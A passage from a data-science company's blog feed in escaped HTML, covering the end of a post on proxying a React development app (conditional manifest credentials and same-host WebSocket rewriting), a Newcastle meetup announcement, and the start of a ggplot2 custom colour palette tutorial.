use the already included &lt;code&gt;HtmlWebpackPlugin&lt;/code&gt; to conditionally include our changes:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&amp;lt;&lt;/span&gt;% if (process.env.NODE_ENV === &amp;#39;development&amp;#39;) { %&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;&amp;lt;!-- enable authentication in dev mode only --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;link&lt;/span&gt; rel&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;manifest&amp;#34;&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;%PUBLIC_URL%/manifest.json&amp;#34;&lt;/span&gt; crossorigin&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;use-credentials&amp;#34;&lt;/span&gt; /&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&amp;lt;&lt;/span&gt;% } else { %&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;link&lt;/span&gt; rel&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;manifest&amp;#34;&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;%PUBLIC_URL%/manifest.json&amp;#34;&lt;/span&gt; /&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&amp;lt;&lt;/span&gt;% } %&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;blockquote&gt;
&lt;p&gt;Note that if you are running your production application behind a protected endpoint, such as when
using RStudio Connect, you may remove the conditional statement and include credentials in all cases.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="issue-4---websocket-connections"&gt;Issue 4 - WebSocket connections&lt;/h3&gt;
&lt;p&gt;Finally, you may have noticed that auto-reload is not enabled and there are network errors every ~5
seconds.&lt;/p&gt;
&lt;p&gt;We can fix this by intercepting all WebSocket connections made from our web page. Add a script tag
to the head of &amp;ldquo;public/index.html&amp;rdquo;. As with the authenticated manifest, we can embed this script
only when in development mode.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&amp;lt;&lt;/span&gt;% if (process.env.NODE_ENV === &amp;#39;development&amp;#39;) { %&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; WebSocketProxy &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;new&lt;/span&gt; Proxy(window.WebSocket, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; construct(target, args) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; console.log(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Proxying WebSocket connection&amp;#34;&lt;/span&gt;, ...args);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;let&lt;/span&gt; newUrl &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;wss://&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; window.location.host &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;%PUBLIC_URL%/ws&amp;#34;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; ws &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;new&lt;/span&gt; target(newUrl);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Configurable hooks
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; ws.hooks &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; beforeSend&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; () =&amp;gt; &lt;span style="color:#79c0ff"&gt;null&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; beforeReceive&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; () =&amp;gt; &lt;span style="color:#79c0ff"&gt;null&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; };
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Intercept send
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; sendProxy &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;new&lt;/span&gt; Proxy(ws.send, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; apply(target, thisArg, args) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (ws.hooks.beforeSend(args) &lt;span style="color:#ff7b72;font-weight:bold"&gt;===&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;false&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; target.apply(thisArg, args);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ws.send &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; sendProxy;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Intercept events
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; addEventListenerProxy &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;new&lt;/span&gt; Proxy(ws.addEventListener, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; apply(target, thisArg, args) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (args[&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;===&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;message&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; ws.hooks.beforeReceive(args) &lt;span style="color:#ff7b72;font-weight:bold"&gt;===&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;false&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; target.apply(thisArg, args);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ws.addEventListener &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; addEventListenerProxy;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Object.defineProperty(ws, &lt;span style="color:#a5d6ff"&gt;&amp;#34;onmessage&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; set(func) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; onmessage &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt; onMessageProxy(event) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (ws.hooks.beforeReceive(event) &lt;span style="color:#ff7b72;font-weight:bold"&gt;===&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;false&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; func.call(&lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;, event);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; };
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; addEventListenerProxy.apply(&lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;, [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;message&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; onmessage,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;false&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Save reference
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; window._websockets &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; window._websockets &lt;span style="color:#ff7b72;font-weight:bold"&gt;||&lt;/span&gt; [];
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; window._websockets.push(ws);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; ws;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; window.WebSocket &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; WebSocketProxy;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&amp;lt;&lt;/span&gt;% } %&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Refresh your applications and wait to confirm that there are no WebSocket connection errors any
more.&lt;/p&gt;
&lt;h2 id="references"&gt;References&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Intercept WebSockets: &lt;a href="https://gist.github.com/Checksum/27867c20fa371014cf2a93eafb7e0204" rel="external"&gt;https://gist.github.com/Checksum/27867c20fa371014cf2a93eafb7e0204&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Change PUBLIC_URL: &lt;a href="https://stackoverflow.com/a/58508562" rel="external"&gt;https://stackoverflow.com/a/58508562&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;React development proxies:
&lt;a href="https://create-react-app.dev/docs/proxying-api-requests-in-development/" rel="external"&gt;https://create-react-app.dev/docs/proxying-api-requests-in-development/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Authenticated manifest.json: &lt;a href="https://stackoverflow.com/a/57184506" rel="external"&gt;https://stackoverflow.com/a/57184506&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Conditional index.html:
&lt;a href="https://betterprogramming.pub/how-to-conditionally-change-index-html-in-react-de090b51fed3" rel="external"&gt;https://betterprogramming.pub/how-to-conditionally-change-index-html-in-react-de090b51fed3&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/react-workbench/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>North East Data Scientists Meetup</title><link>https://www.jumpingrivers.com/blog/north-east-data-scientists-meetup/</link><pubDate>Tue, 28 Jun 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/north-east-data-scientists-meetup/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/north-east-data-scientists-meetup/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/north-east-data-scientists-meetup/original.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re based in the North East of England and you&amp;rsquo;re looking for a place to
discuss all things R with like-minded people, then you might want to check out
the &lt;a href="https://www.meetup.com/Newcastle-Upon-Tyne-Data-Science-Meetup/" rel="external"&gt;North East Data Scientist (NEDS) Meetups&lt;/a&gt;!&lt;/p&gt;
&lt;p&gt;Hosted every two months in the amazing &lt;a href="https://www.thecatalystnewcastle.co.uk/" rel="external"&gt;Catalyst building&lt;/a&gt; in the centre of
Newcastle upon Tyne, the NEDS meetups are an excellent opportunity to network
with like-minded data science enthusiasts and professionals. We hold two talks
at each session presented by data science experts from across the North East,
and we have have recently started running pre-event workshops delivered by our
very own JR trainers!&lt;/p&gt;
&lt;p&gt;The best thing is, the event is completely free, with costs covered by our generous
sponsors, listed at the end of this post!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-north-east-data-scientists-meetup"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="our-next-neds-meetup-july-14th-2022"&gt;Our next NEDS Meetup: July 14th 2022&lt;/h3&gt;
&lt;p&gt;The &lt;a href="https://www.meetup.com/newcastle-upon-tyne-data-science-meetup/events/286235478/" rel="external"&gt;next NEDS meetup&lt;/a&gt; is coming up soon!
This time, we will be having some exciting talks from &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&amp;rsquo;&lt;/a&gt; &lt;a href="https://www.linkedin.com/in/myles-mitchell-4009aa98/" rel="external"&gt;Myles Mitchell&lt;/a&gt;, who will
be talking about JR&amp;rsquo;s new tool, &lt;a href="https://diffify.com/" rel="external"&gt;Diffify&lt;/a&gt;, and
&lt;a href="https://www.linkedin.com/in/pennypegman/" rel="external"&gt;Penny Pegman&lt;/a&gt;, a Lead Data Scientist at the Department for Work and Pensions!&lt;/p&gt;
&lt;p&gt;We will also have &lt;a href="https://www.linkedin.com/in/jwalton93/" rel="external"&gt;Jack Walton&lt;/a&gt;, one of JR&amp;rsquo;s
Data Scientists and Trainers delivering a hands on, interactive
demonstration of plotting with matplotlib in Python, with the pre-event workshop,
Plotting in Python: The Basics.&lt;/p&gt;
&lt;p&gt;If you want to have a look at more details, or register for the event, take a
look at the event on &lt;a href="https://www.meetup.com/newcastle-upon-tyne-data-science-meetup/events/286235478/" rel="external"&gt;Meetup.com&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="sponsorship"&gt;Sponsorship&lt;/h3&gt;
&lt;p&gt;This event is sponsored by:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;, an analytics company whose passion is data and machine learning.&lt;/li&gt;
&lt;li&gt;The &lt;a href="https://www.nicd.org.uk/" rel="external"&gt;National Innovation Centre for Data (NICD)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;The &lt;a href="https://www.r-consortium.org/" rel="external"&gt;R Consortium&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/north-east-data-scientists-meetup/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Custom colour palettes for {ggplot2}</title><link>https://www.jumpingrivers.com/blog/custom-colour-palettes-for-ggplot2/</link><pubDate>Thu, 23 Jun 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/custom-colour-palettes-for-ggplot2/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/custom-colour-palettes-for-ggplot2/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/custom-colour-palettes-for-ggplot2/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Choosing which colours to use in a plot is an important design decision.
A good choice of colour palette can highlight important aspects of your
data, but a poor choice can make it impossible to interpret correctly.
There are numerous colour palette R packages out there that are already
compatible with {ggplot2}. For example, the
&lt;a href="https://cran.r-project.org/web/packages/RColorBrewer/index.html" rel="external"&gt;{RColorBrewer}&lt;/a&gt;
or
&lt;a href="https://cran.r-project.org/web/packages/viridis/vignettes/intro-to-viridis.html" rel="external"&gt;{viridis}&lt;/a&gt;
packages are both widely used.&lt;/p&gt;
&lt;p&gt;If you regularly make plots at work, it’s great to have them be
consistent with your company’s branding. Maybe you’re already doing this
manually with the &lt;code&gt;scale_colour_manual()&lt;/code&gt; function in {ggplot2} but it’s
getting a bit tedious? Or maybe you just want your plots to look a
little bit prettier? This blog post will show you how to make a basic
colour palette that is compatible with {ggplot2}. It assumes you have
some experience with {ggplot2} - you know your geoms from your
aesthetics.&lt;/p&gt;
&lt;h2 id="building-a-colour-palette"&gt;Building a colour palette&lt;/h2&gt;
&lt;p&gt;To make a custom colour palette, there are three basic things you need
to do:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Define your colours&lt;/li&gt;
&lt;li&gt;Generate a palette from your list of colours&lt;/li&gt;
&lt;li&gt;Create {ggplot2} functions to use your palette&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-custom-colour-palettes-for-ggplot2"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="defining-your-colours"&gt;Defining your colours&lt;/h3&gt;
&lt;p&gt;The process of adding colours is probably the simplest part of creating
colour palette functions. We need to create a named list where the names
are the names of our colour palettes. Each entry in the list is a vector
of the colours in that palette. Using lists (instead of data frames) is
essential because it allows us to create colour palettes with different
numbers of colours. It’s most common to define colours by their hex
codes, but we could also define colours by using their character names
e.g. &lt;code&gt;&amp;quot;blue&amp;quot;&lt;/code&gt;, or their RGB values using the &lt;code&gt;rgb()&lt;/code&gt; function. We’ll
stick to hex codes here.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cvi_colours &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cvi_purples &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;#381532&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#4b1b42&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#5d2252&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#702963&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#833074&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#953784&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#a83e95&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; my_favourite_colours &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;#702963&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#637029&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#296370&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Here, we’ve kept the example small, and created a list called
&lt;code&gt;cvi_colours&lt;/code&gt; (short for corporate visual identity) with just two colour
palettes.&lt;/p&gt;
&lt;h3 id="generating-a-palette"&gt;Generating a palette&lt;/h3&gt;
&lt;p&gt;We need to create a function that generates an actual colour palette
from our simple list of colours. This function will take four arguments
to define:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the name of the colour palette we want to use,&lt;/li&gt;
&lt;li&gt;the list of colour palettes we want to extract our choice from,&lt;/li&gt;
&lt;li&gt;how many colours from it we want to use&lt;/li&gt;
&lt;li&gt;whether we want a discrete or continuous colour palette&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cvi_palettes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(name, n, all_palettes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; cvi_colours, type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;discrete&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;continuous&amp;#34;&lt;/span&gt;)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; palette &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; all_palettes[[name]]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#d2a8ff;font-weight:bold"&gt;missing&lt;/span&gt;(n)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; n &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(palette)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;match.arg&lt;/span&gt;(type)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; out &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;switch&lt;/span&gt;(type,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; continuous &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; grDevices&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;colorRampPalette&lt;/span&gt;(palette)(n),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; discrete &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; palette[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;n]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
